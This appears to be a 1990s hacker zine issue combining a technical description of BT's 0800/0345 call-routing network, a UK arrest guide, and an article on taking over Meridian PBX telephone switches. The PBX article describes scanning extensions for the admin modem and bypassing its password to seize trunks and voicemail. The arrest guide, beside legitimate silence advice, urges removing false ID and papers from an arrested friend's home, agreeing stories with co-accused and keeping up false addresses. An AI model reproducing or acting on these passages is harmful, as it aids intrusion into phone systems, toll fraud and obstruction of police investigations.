ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛ°°Û ³ BRISTOL ³ BRANCH ³ ³ SATURDAY ³ AND ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³ SUNDAY º "ALL OFFICES ARE º ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ CLOSED FOR THE º º WEEKEND..." º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ COURTESYLINK SERVICE ADMINISTRATION ====================== Service Administration for Advanced LinkLine features is handled by the network subscriber transaction, administration and recording system (NETSTAR), which has on-line access to the NCPs. NETSTAR provides user friendly access to the NCP advanced feature database to modify, create or delete service provider call routing plans via dedicated or dialup/dialback links to VDUs. An NCP can have only one active call routing plan for any service provider number, but additional plans may be prepared and held in NETSTAR for transmission to, and activation at, the NCP when required. NETSTAR holds security backup copies of all call routing plans and NCP operating parameters. CALL PROCESSING =============== Derivation of the Calling Subscriber Geography (CSG) ---------------------------------------------------- All 0800 and 0345 calls are routed via a DMSU to a DDSN action control point (ACP) (Figure 7). During Call set-up, the ACP requests additional set-up information to be sent via the C7BT Link. This cause the calling line identity (CLI) to be forwarded from the first exchange in the call path with C7BT signalling. Figure 7 : Access to the Digital Derived Services Network PSTN DDSN ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ¿ ³ DLE ÃÄÄÄÄC7BTÄÄÄ´ ÃÄÄÄÄC7BTÄÄÄ´ ÃÄÄÄÄC7BTÄÄÄ´ ³ ³ or ³ ³ DMSU ³ ³ 5ESS-PRX ³ ³ 5ESS-PRX ³ ³ E-ALE ÃÄTÄTÄTÄTÄTÄ´ ÃÄTÄTÄTÄTÄTÄ´ (ACP) ÃÄTÄTÄTÄTÄTÄ´ (ACP) ³ ÀÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄ´ ³ ³ ³ ³ ³ ÚÄÄÄÄÄÄÄ¿ ³ ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÄÙ ³ AMSU/ ÃÄÙ ³ ³ ³ +ALE ³ ³ ³ ÀÄÄÄÄÄÄÄÙ ³ ³ Á Á SP SP * ALE may be via a digital concentrator centre exchange E-ALE : Enhanced analogue Local Exchange (C7BT signalling capability) If a call is originated from a local exchange with C7BT signalling, a full calling line identity (FCLI) is returned to the ACP. The FCLI includes the caller's national number group (NNG) code, or all figure numbering (AFN) code in the case of a director area. If the call is originated from an analogue local exchange (ALE), then a partial calling line identity (PCLI) is derived by the first digital exchange in the call path. This will normally be a DMSU, but in cases where an ALE is parented on a digital concentrator centre exchange (DCCE), the DCCE generates the PCLI. A PCLI must comprise sufficient information to uniquely identify the digital entry point to the PSTN used by that ALE. This information includes the region, area and unit identity portions of the network nodal identity plus the telephony process number and route numbers used by the call processing software of the digital exchange. Whe a PCLI or FCLI is received by a DDSN action control point, the call processing software searches through a set of look-up tables for a comparison with the CLI sent. This search will result in the calling subscriber geography (CSG) being identified. Figures 8 and 9 illustrate the CLI and CSG derivation process. Figure 8 : CLI derivation ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ DLE ÃÄ<ÄÄÄÄÄÄÄÄÄ¿ DMSU ³ ³ 5ESS-PRX ÃÄÄÄÄÄÄÄÄÄ´ 5ESS-PRX ³ ³ E-ALE ³ ³ ³ ³ ³ (ACP) ³ ³ (ACP) ³ ÀÄÄÄÄÄÄÄÙ ³ ³ ³ ³ ³ ³ ³ ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄ<ÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ ÚÄÄÄÄÄÄÄ¿ ³ ³ ³ ³ REQUEST ³ ³ ³ ³ ALE ³ ?ÄÄÄÄÄÄÄÄÄÙ ³ ³ CLI ³ ³ ³ ÀÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ Figure 9 : CSG derivation ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ FCLI ÄÄÄ>ÄÄÄÄÄÄÄÄÄ¿ DMSU ³ ³ 5ESS-PRX ÃÄÄÄÄÄÄÄÄÄ´ 5ESS-PRX ³ ³ DLE ³ ³ ³ ³ ³ (ACP) ³ ³ (ACP) ³ ÀÄÄÄÄÄÄÄÙ ³ ³ ³ FCLI ³ ³ ³ ³ ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄ>ÄÄÄÄÄÄÄÄCLI/CSG ³ ³ ³ ³ ³ ³ PCLI ³ TABLES ³ ³ ³ ÚÄÄÄÄÄÄÄ¿ ³ ³ ³ ³ ³ ³ ³ ³ ³ ALE ³PCLIÄ>ÄÄÄÄÄÙ ³ ³ CSG ³ ³ ³ ÀÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ Global Title Translation ------------------------ Call processing for service providers with basic features is handled within the DDSN switching nodes. To differentiate between calls to SPs with advanced and basic features, the ACP checks for the existence of a translation for the number dialled. If a translation exists, the call is routed to the specified network termination. If the translation does not exist, call handling instructions are returned from the NCP database in response to a query message from the originating ACP. A number of query messages are neccesary for some types of call; the initial query is therefore termed QRY1. The process is illustrated in Figures 10 and 11. Figure 10 : DDSN ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ Intelligent Network call ³ INCOMING CALL ³ Processing (Call not ³ FROM PSTN ³ requiring NSC and no ³ DIGITS RECEIVED ³ network controls active) ³ AT ORIGINATING ³ ( OR (0) 345 DEFGHJ ) ³ ACP ³ ³ (0)800 345800 ³ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÙ GTT : GLOBAL ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿ TITLE ³ ACP REQUESTS ³ TRANSLATION ³ ADDITIONAL ³ ( SEE FIGURE 8 ) ³ SET-UP INFO ³ ³ VIA C7BT LINK ³ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿ ³ FCLI OR PCLI ³ ( SEE FIGURE 8 ) ³ FORWARDED TO ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ACP ³ ³ ORIGINATING ACP ³ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÙ ³ DEALS. ³ ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿ YES ³ CALL SETUP ³ ³ TRANSLATION HELDÃÄÄÄÄÄÄ>ÄÄÄÄÄ´ NORMALLY USING ³ ³ AT ACP ³ ³ C7BT LINK ³ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  NO ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ NO ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿ YES ³ SEND QRY1 ³ ÚÄÄÄÄÄÄÄÄÄÄÄ<ÄÄÄ´ IS 0800-345 ÃÄÄÄ>ÄÄÄÄÄÄÄÄ´ MESSAGE TO NCP ³ ³ ³ DEFINED IN GTT? ³ ³ VIA C7NA ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ LINK ³  ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÙ ³ ³ SEND A FINAL ³ ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄ¿ ³ ³ TREATMENT OF ³ NO ³ IS A PLAN HELD ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´'VACANT CODE' TO ÃÄÄÄÄÄ<ÄÄÄÄÄÄ´ AT NCP FOR 800 ³ ³ ³ ACP ³ ³ 345800? ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÙ ³  YES  ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ NCP DETERMINES ³ ³ ³ CALL TREATMENT. ³ ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ BILLING AND ROUTING ³ ³ 'VACANT CODE' ³ ³ DETAILS TO ACP ³ ³ NUMBER UNOBTAINABLE TONE ³ ³ VIA C7NA ³ ³ RETURNED ³ ÀÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄ¿ ³ ORIGINATING NCP ³ ³ SETS UP CALL USING ³ ³ C7BT LINK ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Figure 11 : ACP Communication with NCP ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ (ACP 1) ³ ³ TRANSLATION ³ ³ NOT HELD ³ ³ Ä ³ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 0800 DEF ³ ³ NCP ³ ³ IN GTT ³ ÃÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ = ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ C ³ ÚÄÄÄÄÄÄÄÄÄ¿³ ³ ³ ³ (ACP 2) ÚÄÄÄ´ ³ N ³ ³ SP ³³ ³ SEND QRY1 ÄÄ>ÄÄÄC7NAÄÄÄ>ÄÄÄÄÄÄÄÄÄÄÄÄÄ´ S ÃÄ>ÄC7NAÄ>ÄÄÄ´ I Ã>Ä´ RECORD ³³ ³ TO NCP ³ ³ ³ T ³ ³ R ³ ÀÄÄÄÄÂÄÄÄÄÙ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ ³ E ³ ³ I ³ ³ ³ ³ BILLING ÄÄ<ÄÄÄC7NAÄÄÄ<ÄÄÄÄÄÄÄÄÄÄÄÄÄ´ P ÃÄ<ÄC7NAÄ<ÄÄÄ´ N Ã<ÄÄÄÄÄÄÙ ³ ³ INSTRUCTIONS³ ÀÄÄÄÄÄÄÄÄÄÁÄÄÄÙ ³ G ³ PROCESSOR ³ ³ + ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÀÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ROUTE ³ ³ (ACP n) ³ ³ MESSAGE ³ ³ CALL SET-UP ³ ³ OR ³ ³COMPLETED TO ³ ³ FINAL ÄÄÄÄÄÄÄC7BTÄÄÄÄÄÄÄ´ SERVICE ÃÄÄÄÄÄÄÄÄÄÄÄÄ SP ³ TREATMENT ³ ³ PROVIDER ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ACP 1 = ACP receiving call from PSTN ACP 2 = ACP with directly connected NCP ACP n = The ACP on which the SP is terminated The QRY1 message includes: a) 10 digit dialled number, which excludes any leading 0 but includes a trailing 0 as padding if only 9 digits long. b) Calling subscriber geography (CSG). c) The ACP which originated the query. This is used to reference a table in the NCP which defines the capabilities of the ACP,; for example, whether it has an NSC. d) The destination of the query. The route message includes a network code of up to 10 digits which is used by the ACP to route the call to its destination. This is normally a service provider (SP) line, but can be an NSC announcement. A final treatment command is sent to the ACP when the NCP cannot route a call normally. The final treatment command results in either a tone or an announcement being returned to the caller. Calls Requiring an NSC ---------------------- As not all ACPs are hosts to an NSC, a call which requires an NSC at some point during the call treatment must be setup in two parts. After the QRY1 Message, the call is routed to an ACP/HOST, using C7BT in the normal manner, where a voice trunk to the NSC is allocated. This action is termed a 'service assist' if the NSC is required as intermediate step in the call treatment (SelectLink) or a 'hand-off' if the NSC is required to play an announcement as the final routing conclusion (CourtesyLink). During a service assist or a hand-off, the ACP/HOST then queries the NCP a second time (QRY2) with details of the NCP and call number used for the QRY1 message. The call treatment now continues with a list of commands being sent from the NCP to the NSC. This could be to play an announcement and collect digits from the caller. NCP/NSC communication takes place via the C7NA links with any digits collected being returned to the NCP to determine the final disposition of the call. CALL LOGGING ============ In response to a query message from the originating ACP, the NCP returns a billing command instructing the ACP what details to record; the ACP acknowledges receipt of the instructions to the NCP. On answer, the terminating exchange sends a message to the originating ACP giving either 'answer / no charge' or 'answer / charge' depending on which LinkLine (0800/0345) is defined. On Call termination, the ACP records the details of the call in an automatic message accounting (AMA) record. The originating ACP normally controls the call and is responsible for generating an automatic message accounting record. These records are periodically polled by an on-line data collector which validates them before passing them to an off-line charge raising system which calculates call charges in preparation for the production of the service provider's bill. Where a 'hand-off' has occurred, the ACP/HOST takes over control of the call for supervisory and logging purposes. OPERATIONS AND MAINTENNANCE =========================== The Multi-Function Operations System (MFOS) is central to the operations and maintennance fucntions for the DDSN intelligent network. These functions include: o On-line access to the ACPs/NCPs/NSCs o Alarm Collection and Monitoring o Collection and analysis of traffic data o Real time Network management Connection between the multi-function operations system processors, the network elements and the users is achieved using a virtual circuit switch for flexibility. ///// ///// ///// ///// ///// ///// ///// ///// ///// ///// . : | +-+[ being arrested in th uk ]+---> by bodie <-------------------------------+ +-+[ D4RKCYDE ]+---> bodi3@usa.net <--------------------------+ | : . NO COMMENT - A DEFENDENTS GUIDE TO ARREST Reprinted from booklet by AK Disrtibution by Bodie - ****** This information is primaraly based on the english legal system. Although most of the information is valid for other countries including the US ****** GETTING ARRESTED IS NO JOKE It's a serious business. All convictions add up: eg, if your arrested 3 times for shoplifting, you stand a good chance of getting sent down. If theres a chance of you getting nicked, get your act together: know what to do in case you're arrested. Unless you enjoy cells, courtrooms and prisons, you owe it to yourself to wise up. WHEN YOU HAVE BEEN ARRESTED You have to give the police your NAME, ADDRESS and your DATE OF BIRTH. They also have the right to take your fingerprints and other non-intermate body samples. The Criminal Justice and Public Order Act 1994 has now removed the traditional 'Right to Silence' (from April 10th 1995). Howver, all this means is that the police/prosecution can point to your refusal to speek to them when the case comes to court, and the court MAY take this as evidence of your guilt. THE POLICE CAN NOT FORCE YOU TO SPEEK OR MAKE A STATEMENT, WHATEVER THEY SAY TO YOU IN THE STATION. Refusing to speek cannot be used to convict you by itself. It's yet to be seen how the police will use this change in the law but we reckon the best policy IF YOU WANT TO GET OFF is to REMAIN SILENT. The best place to work out a good defence is afterwards, with your solicitor or witnesses, not under pressure in the hands of the cops. If yout refusal to speek comes up in court, the best defence we think is to refuse to speek until your solicitor gets there, then get them to agree your position. You can then say you acted on legal advice. KEEPING SILENT IS STILL THE BEST THING TO DO IN POLICE CUSTODY. REMEMBER: ALL CHARGES ADD UP. Q: WHAT HAPPENS WHEN I GET ARRESTED? When you are arrested, you will be taken to a police station, you will be asked your name, address and date of birth. Your personal belongings will be taken from you. These are listed on the custardy record and usually you will be asked to sign that the list is correct. You should sign immediately below the last item, so the cops can't add something incriminating to the list. You should also refuse to for something which isn't yours, or which could be incriminating. You will then be placed in a cell until the police are ready to deal with you Q: WHEN CAN I CONTACT A SOLICITOR? You should be able to ring a solicitor as soon as you've been arrested. Once at the police station it is once of the first things you should do, for two reasons: 1. To have someone know where you are 2. To show the cops you are not going to be a soft target, they may back off a bit. It is advisable to avoid using the duty solicitor as they are often either crap or hand in glove with the cops. It's worth finding the number of a good solicitor in your area and memorising it. The police are wary of decent solicitors. Also avoid telling your solicitor exactly what happened: this can be sorted out later. For the time being, tell him you are refusing to speek. Your solicitor can come into the police station while the police interview you: you should refuse to be interviewed unless your solicitor is present. Q. WHAT IS AN INTERVIEW An interview is the police questioning you about the offences they want to charge you with. The interview will usually take place in an interview room in the police station. An interview is only of benefit to the police. Remember they want to prosecute you for whatever charges they can stick on you. THE INTERVIEW IS A NO WIN SITUATION. For your benefit the only thing to be said in an interview is 'No Comment' Remember: THEN CAN'T LEGALLY FORCE YOU TO SPEEK Q: WHY DO THE POLICE WANT ME TO ANSWER QUESTIONS? IF THE POLICE THINK THEY HAVE ENOUGH EVIDENCE AGAINST YOU THEY WILL NOT NEED TO INTERVIEW YOU. eg, in most public order arrests they rely on witness statements from 1 or 2 cops or bystanders, you won't even be interviewed. The police want to convict as many people as possible because: 1. They want to convict you because it makes it look like they're doing a good job at solving crime. The 'clear-up rate' is very important to the cops, they have to be seen to be doing their job. The more crimes they get convictions for, the better it looks for them. 2. Police officers want promotion, to climb the ladder of hierarchy. Coppers get promotion through the number of crimes they 'solve'. No copper wants to be a bobby all their life. A 'solved crime' is a conviction against somebody. You only have to look at such cases as the Birmingham 6 to understand how far the police will go to get a conviction. Fitting people up to boost the 'clear-up rate' and at the same time removing people the cops don't like is a widespread part of all police forces. Q: SO IF THE POLICE WANT TO INTERVIEW ME, IT SHOWS I COULD BE IN A GOOD POSITION? Yes, they may not have enough evidence, and hope you'll implicate yourself or other people Q: AND THE WAY TO STAY IN THAT POSITION IS TO REFUSE TO BE DRAWN INTO A CONVERSATION AND ANSWER "NO COMMENT" TO ANY QUESTIONS? Exactly Q: BUT WHAT IF THE EVIDECE LOOKS LIKE THEY HAVE GOT SOMETHING ON ME? WOULDN'T IT BE BEST TO EXPLAIN AWAY THE CIRCUMSTANCES I WAS ARRESTED IN, SO THEY'LL LET ME GO? The only evidence that matters is the evidence presented in court to the magistrate or judge. The only place to explain everything is in court. If they've decided to keep you in, no ammount of explaining will get you out. If the police have enough evidence, anything you say can only add to the evidence against you. When the cops interview someone, they do all they can to confuse and intimidate you. The questions may not be related to the crime. Their aim is to soften you up, get you chatting. Don't answer a few small talk questions and then clam up when they ask you a question about the crime. It looks worse in court. To prosecute you, the police must present their evidece to the Crown Prosecution Service. A copy of the evidence will be sent to your solicitor. The evidence usually rests on very small points: this is why it's important not to give anything away in custody. If they don't have enough evidence the case could be thrown out of court or never even get to court. This is why they want you to speek. They need all the evidence they can get. One word could cause you a lot of trouble. Q: SO I'VE GOT TO KEEP MY MOUTH SHUT. WHAT TRICKS CAN I EXPECT THE POLICE TO PULL IN ORDER TO MAKE ME TALK? The police try to get people to talk in many devious ways. The following four pages show some pretty common examples, but remember they may try some other line on you. THESE ARE THINGS THAT OFTEN CATCH PEOPLE OUT DON'T GET CAUGHT OUT 1: "Come on now, we know it's you, your mate's in the next cell and he's told us the whole story" (If they've got the story, why do they need your confession? Plauing co-accused off against each other is a common trick as you have no way of checking what the other person is saying. If you are up to something dodgy with other people, work out a story and stick to it. Plus you can't be convicted just on the word of a co-accused.) 2: "We know it's not you, but we know you know who's done it. Come on Jane, don't be silly, tell us who done it" --- (The cops will use your first name to try and seem as though they're your friends. If you are young they will act in a fartherly/motherly way, etc.) 3: "As soon as we find out what happened you can go" (Fat chance) 4: "Look you little bastard. don't fuck us about. We've dealt with some characters, a little runt like you is nothing to us. We know you did it, you little shit and your going to tell us" 5: "Whats a nice kid like you doing messed up in a thing like this?" (They're trying to get at you) 6: "We'll keep you in till you tell us" (Unless they charge you with a 'serious offence' they have to release you within 24 hours. Even if you are suspected of a 'serious offence' you have the right to a solicitor after 36 hours, and only a magistrate can order you to be heald without charge for longer) 7: "You'll be charged with something far more serious if you don't answer our questions, sonny. You're for the high jump. Your not going to see the light of day for a long time. Start answering our questions cos we're getting sick of you" (Mental intimidation. They're unlikely to charge you with a serious offence that won't stick in court. Don't panic) 8: "My niece is a bit of a rebel" 9: "If someone's granny gets mugged tonight it'll be your fault. Stop wasteing our time by not talking" (They're trying to make you feel guilty. Don't fall for it - did you ask to be nicked or interviewed?) 10: Mr Nice: "Hiya, whats it all about then? Sergent Smith says your in a bit of trouble. He's a bit wound up with you. You tell me what happened and Smith won't bother you. He's not the best of our officers, he loses his rag every now and again. So what happened?" (Mr Nice is as devious as Mr Nasty. He or she will offer you a cuppa, cigarettes, a blanket. It's the softly-softly approach. It's bollocks. 'No Comment') 11: "We've been here for half an hour now and you've not said a fucking word. Look you little cunt, some of the CID boys will be down in a minute. They'll have you talking in no time. Talk now or i'll bring then down" (Keep at it, they're getting desperate. They're about to give up. You've got a lot to lose by speaking) 12: "Your girlfriend's outside. Do you want us to arrest her? We'll soon have her gear off for a strip search. I bet she'll tell us. You're making all this happen by being such a prick. Now Talk" (They pick on weak spots, family, friends, etc. Gerry Conlon of the guildford 4 was told that his mother would be shot by the RUC unless he confessed. Cops sometimes do victimise prisoners families, but mostly they're bluffing) 13: "You're a fucking loony you! Who'd want you for a mother, you daft bitch? Confess or your kids are going into care" 14: "Look, we've tried to contact your solicitor, but we can't get hold of them. It's going to drag on for an ages this way. Why don't you use one of our duty solicitors, and we'll soon get this situation cleared up so you can go home" (Never accept an interview without your solicitor present, and don't make a statement even if your solicitor advises you to - a good one won't) 15: "You're obviously no dummy. I'll tell you what, we'll do a deal. You admit to one of the charges and we'll drop the other two. You admit to it and we'll recoment to the judge you get a non-castodial sentence, because you've co-operated. How does that sound?" (They're trying to get you to do a deal. There are no deals to be made with the police. This bloke got sent down for not paying a fine. The prisoner he was hand-cuffed to in the prison bus did a deal with the police. He pleaded guilty to a charge after being promised a non-castodial sentence. The man trusted the police, he was a small-time businessman accused of fraud. When it came to court, the judge gave him two years, the bloke was speechless) 16: "We've been round to the address you gave and the people there say they don't know you. We've checked up on the DSS computer and theres no sign of you. Now come on, tell us who you are. Wasteing police time is a very serious offence. Now tell us who you are or you've had it" (If you've sorted out a false address with someone, make sure they're reliable, and everyone in the place knows the name you're using. Stick at it, if you're confident. You can't be charged for wasteing police time for not answering questions) 17: "They've abolished the right to silence - you have to tell us everything now, it's the law" (As we said at the beginning, you can still say nothing, there is no obligation to tell the cops anything beyond your name, address and date of birth) --- If you are nicked on very serious charges, or for serious violence to a police officer, the cops may rough you up or use violence and torture to get a confession (true or false) out if you. Many of the people freed after being fitted up by the West Midlands Serious Crime Squad or comming to light now in manchester, were physically abused till they admitted to things they hadn't done. If this happens, obviously it's your decision to speek rather than face serious injury, but remember, what you say could land you inside for a long time, even if it's not true. Don't rely on retracting a confession in court - it's hard to back down once you've said something. In the police station the cops rely on peoples naivety. If you are sussed the chances are they'll give up on you. In these examples we have tried to show how they'll needle you to speek. Thats why you have to know what to do when you're arrested. The hassle in the copshop, but if you are on the ball, you can get off. You have to be prepared. We've had a lot of experience with the police and we simply say: 1: Keep calm and cool when arrested (remember you are on their home ground) 2: Get a solicitor 3: Never make a statement 4: Don't get drawn into conversations with the police 5: If they rough you up, see a doctor immediately after being released. Get a written report of all bruising and marking. Remember the officers names and numbers if possible Having said nothing in the police station, you can then look at the evidence and work out you alibi, your side of the story. THIS IS HOW YOU WILL GET OFF REMEMBER: An interview is a no-win situation. You are not abliged to speek. If the police want to interview you, it shows you're in a good position... ...And the only way to stay in that position is to refuse to be drawn into any conversation and answer "NO COMMENT" to any questions Q: WHAT CAN I DO IF ONE OF MY FRIENDS IS ARRESTED? If someone you know is arrested there's a lot you can do to help them from the outside. 1. If you know what name they are using as soon as you think they've been arrested, ring the police station. Ask whether they are being held there and on what charges 2. Inform a decent solicitor 3. Remove anything from the arrested persons house that the police may find interesting: letters, address books, false ID, etc, incase the police raid the place 4. Take food, cigarettes, etc, into the police station for your arrested friend. BUT don't go into enquire at the police station to ask about a prisoner if you run the risk of arrest yourself. You'll only get arrested. The police have been known to lay off a prisoner if they have visible support from the outside. It's solidarity which keeps prisoners in good spirits. SUPPORT PRISONERS . : | +-+[ meridian security audit /switch hacking ]+---> by hybrid <--------------+ +-+[ D4RKCYDE ]+---> hybrid@dtmf.org <--------+ | : . . .. ... .......... BL4CKM1LK teleph0nics .......... ... .. . . .. ... .......... http://hybrid.dtmf.org ......... ... .. . Meridian I Switch and Trunk Interception.......... ..... ... . An account of how an ENTIRE companys PBX.......... ..... ... . can be taken over (The hardcore phreak way)....... ..... ... . by hybrid ...... ..... ... . Hi. I'm not going to write a mad big introduction to this article, because I dont feel their is a need for one. All I want to say here is that this article is intended for the more "hardcore" phreak, yes, hardcore phreak, not for lame ass calling card leeching kiddies who call themsleves phreaks. If you are intersted in hacking telephony switches, and you have prior/prefixed knowledge of Meridian, read on.. Through my experience, I've seen alot of meridian admins go through many different and sometimes repetitive lengths to supposidly secure an internal PSTN connected PABX. In this article I'm going to share my knowledge of PBX switch hacking, and enlighten you to the intricate techneques that can be used to "trunk hop" etc. The information provided in this article has been obtained from my own personal accounts of hacking telephony switches, which I'd like to state, I don't participate in anymore. Now, for the sake of timesaving, I'll setup a possible scenario.. Consider the following: o You have stumbled accross a nice Meridian Mail system, which you have already compromised by finding yourself a few boxdes in their. You discover that the Meridian Mail system you have gained access to belongs to a certain telco, and is used for internal communication between emloyees high up in the hierarchial chain. Now, any "normal" phreak would gradually take over the system by finding as many free boxes as possible and hnading them over to friends, or would keep the nice lil' system to themselves as a means of obtaining information about the telco that owns the PBX, via the the means of eavesdroping on used voicemail boxes. This is a very primitive form of remote eavesdroping, which this file is not designed to illistrate. Meridian PBX systems are all administered by a primary system console, which can be remotely accessed by many different protocols. The most popular of which is remote dialup via assigned extensions. If the companys main switch is centrex based, it is likely that the meridian admin console is accessable via IP on the companys intranet. If you manage to gain access to the actual switching conponment, you are likely to have the following privalges on the meridian based network: o 100% control over every single inbound/outbound trunk group o Access to every single voicemail box on the switch o Access to trunk/group/node administration Basically, the meridian administration module is designed to make the admin (or whoever has access to it) GOD over the entire system, I say GOD because you could do anything you wanted, as far as your telephony derived imagination extends. OK, enough of this.. I'm just going to stop going on about what if's for the time being, now I'm going to concentrate on the factual based information, and how one would go about accessing such a switch. The simpilist way to find the internal dialup to a meridian switch is to scan the internal extensions which the switch controls. It's generaly a good idea to begin scanning network/node extensions such as 00,01,02,03[xx] etc. What you are looking for is a modem carrier, which when you connect should ask you for a singular password, which in most cases is bypassed by hitting control-SD. Once you are in, you should recieve the switches command line prompt, somthing similar to this: > or SWITCH0> OMG, I hear you think.. It looks like a DMS switch prompt.. Well, it is, in a funny kind of way. Meridian switches are designed to emualte certain levels of DMS-100 O/S types, so you'll find that many of the BCS leveled commands that you know from DMS will be usefull here. The information that follows has been obtained from public Meridian Mail Administration sources on the net.. /* Basic Meridian 1 Security Audit ------------------------------- "Users will go nuts calling a radio station to win a free toaster, taking over all the trunks in your phone system." An audit of the Meridian 1 telephone system will ensure that every possible "system" precaution has been made to prevent fraud. The first step involves querying data from the system in the form of printouts (or "capturing" the data to a file in a PC). The next step is to analyze the data and confirm the reason for each entry. Please be advised that this procedure is not designed for all "networked" Meridian 1 systems, however, most of the items apply to all systems. Use at your own risk. PRINTOUTS REQUIRED FOR SECURITY AUDIT: It is suggested that you "capture" all of the data from these printouts to separate files. This can be accomplished with a PC and communications program. For the BARS LD90 NET printout, try this file. (enclosed in faith10.zip barparse.zip) ------------------------------------------------------------------------------ LD22 CFN LD22 PWD LD21 CDB LD21 RDB LD21 LTM LD23 ACD LD24 DISA LD20 SCL LD86 ESN LD86 RLB LD86 DMI LD87 NCTL LD87 FCAS LD87 CDP LD90 NET LD90 SUM LD20 TNB LD22 DNB LD88 AUB ------------------------------------------------------------------------------ GATHERING DATA FROM LD81 ------------------------ List (LST) the following FEAT entries to form an information base on the telephones. ------------------------------------------------------------------------------ NCOS 00 99 CFXA UNR TLD SRE FRE FR1 FR2 CUN CTD ------------------------------------------------------------------------------ DATA BLOCK REVIEW ITEMS ----------------------- From the printouts, a review of the following areas must be made. Some of the items may or may not be appropriate depending on the applications of the telephone system. ------------------------------------------------------------------------------ CFN - Configuration Verify that History File is in use. ------------------------------------------------------------------------------ PWD - Passwords Verify that FLTH (failed login attempt threshold) is low enough. Verify that PWD1 and PWD2 (passwords) use both alpha and numeric characters and are eight or more characters long. Note any LAPW's (limited access passwords) assigned. Enable audit trails. ------------------------------------------------------------------------------ CDB - Customer Verify that CFTA (call forward to trunk access code) Data Block is set to NO. Verify NCOS level of console. Verify that NIT1 through NIT4 (or other night numbers) are pointing to valid numbers. EXTT prompt should be NO to work in conjunction with trunk route disconnect controls (See RDB) ------------------------------------------------------------------------------ RDB - Trunk Route Verify that every route has a TARG assigned. Confirm Data Block that FEDC and NEDC are set correctly. ETH is typical, however for maximum security in blocking trunk to trunk connections, set NEDC to ORG and FEDC to JNT Confirm that ACCD's are a minimum of four digits long (unless for paging). If ESN signaling is active on trunk routes, verify that it needs to be. 